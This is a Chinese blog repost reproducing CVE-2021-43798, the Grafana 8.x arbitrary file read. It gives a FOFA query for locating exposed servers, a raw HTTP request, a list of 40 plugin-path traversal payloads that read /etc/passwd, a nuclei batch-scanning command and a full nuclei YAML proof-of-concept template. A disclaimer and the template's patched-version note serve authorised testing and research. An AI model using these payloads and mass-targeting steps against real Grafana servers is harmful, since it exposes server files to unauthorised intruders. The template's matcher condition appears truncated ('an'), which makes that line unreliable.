本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2021-43798 Grafana任意文件读取漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。未授权的攻击者利用该漏洞,能够获取服务器敏感文件。
![图片[1]-CVE-2021-43798 Grafana任意文件读取漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd170413.png)
0x03 漏洞复现
漏洞影响:
Grafana 8.0.0 – 8.3.0
FOFA:app=”Grafana”
1.抓包并修改payload,即可任意读取/etc/passwd
数据包:
GET /public/plugins/annolist/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
payload集合:
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd
![图片[2]-CVE-2021-43798 Grafana任意文件读取漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd170514.png)
2.nuclei漏洞脚本如下(nuclei稳定快,编写poc简单,有社区维护,推荐使用)
nuclei下载地址:http://github.com/projectdiscovery/nuclei
批量验证命令:
nuclei.exe -list subs.txt -t cves/2021/CVE-2021-43798.yaml
yaml POC:
id: CVE-2021-43798
info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
severity: high
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
reference:
- http://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- http://nosec.org/home/detail/4914.html
- http://github.com/jas502n/Grafana-VulnTips
- http://nvd.nist.gov/vuln/detail/CVE-2021-43798
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-43798
cwe-id: CWE-22
tags: cve,cve2021,grafana,lfi
requests:
- raw:
- |
GET {{(auth)}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
payloads:
auth:
- "/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/annolist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd"
- "/public/plugins/barchart/../../../../../../../../../../../etc/passwd"
- "/public/plugins/bargauge/../../../../../../../../../../../etc/passwd"
- "/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd"
- "/public/plugins/dashlist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd"
- "/public/plugins/gauge/../../../../../../../../../../../etc/passwd"
- "/public/plugins/geomap/../../../../../../../../../../../etc/passwd"
- "/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd"
- "/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd"
- "/public/plugins/graph/../../../../../../../../../../../etc/passwd"
- "/public/plugins/graphite/../../../../../../../../../../../etc/passwd"
- "/public/plugins/heatmap/../../../../../../../../../../../etc/passwd"
- "/public/plugins/histogram/../../../../../../../../../../../etc/passwd"
- "/public/plugins/influxdb/../../../../../../../../../../../etc/passwd"
- "/public/plugins/jaeger/../../../../../../../../../../../etc/passwd"
- "/public/plugins/logs/../../../../../../../../../../../etc/passwd"
- "/public/plugins/loki/../../../../../../../../../../../etc/passwd"
- "/public/plugins/mssql/../../../../../../../../../../../etc/passwd"
- "/public/plugins/mysql/../../../../../../../../../../../etc/passwd"
- "/public/plugins/news/../../../../../../../../../../../etc/passwd"
- "/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd"
- "/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd"
- "/public/plugins/piechart/../../../../../../../../../../../etc/passwd"
- "/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/postgres/../../../../../../../../../../../etc/passwd"
- "/public/plugins/prometheus/../../../../../../../../../../../etc/passwd"
- "/public/plugins/stat/../../../../../../../../../../../etc/passwd"
- "/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd"
- "/public/plugins/status-history/../../../../../../../../../../../etc/passwd"
- "/public/plugins/table/../../../../../../../../../../../etc/passwd"
- "/public/plugins/table-old/../../../../../../../../../../../etc/passwd"
- "/public/plugins/tempo/../../../../../../../../../../../etc/passwd"
- "/public/plugins/testdata/../../../../../../../../../../../etc/passwd"
- "/public/plugins/text/../../../../../../../../../../../etc/passwd"
- "/public/plugins/timeseries/../../../../../../../../../../../etc/passwd"
- "/public/plugins/welcome/../../../../../../../../../../../etc/passwd"
- "/public/plugins/zipkin/../../../../../../../../../../../etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:"
- "grafana:"
condition: an
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END




















请登录后查看评论内容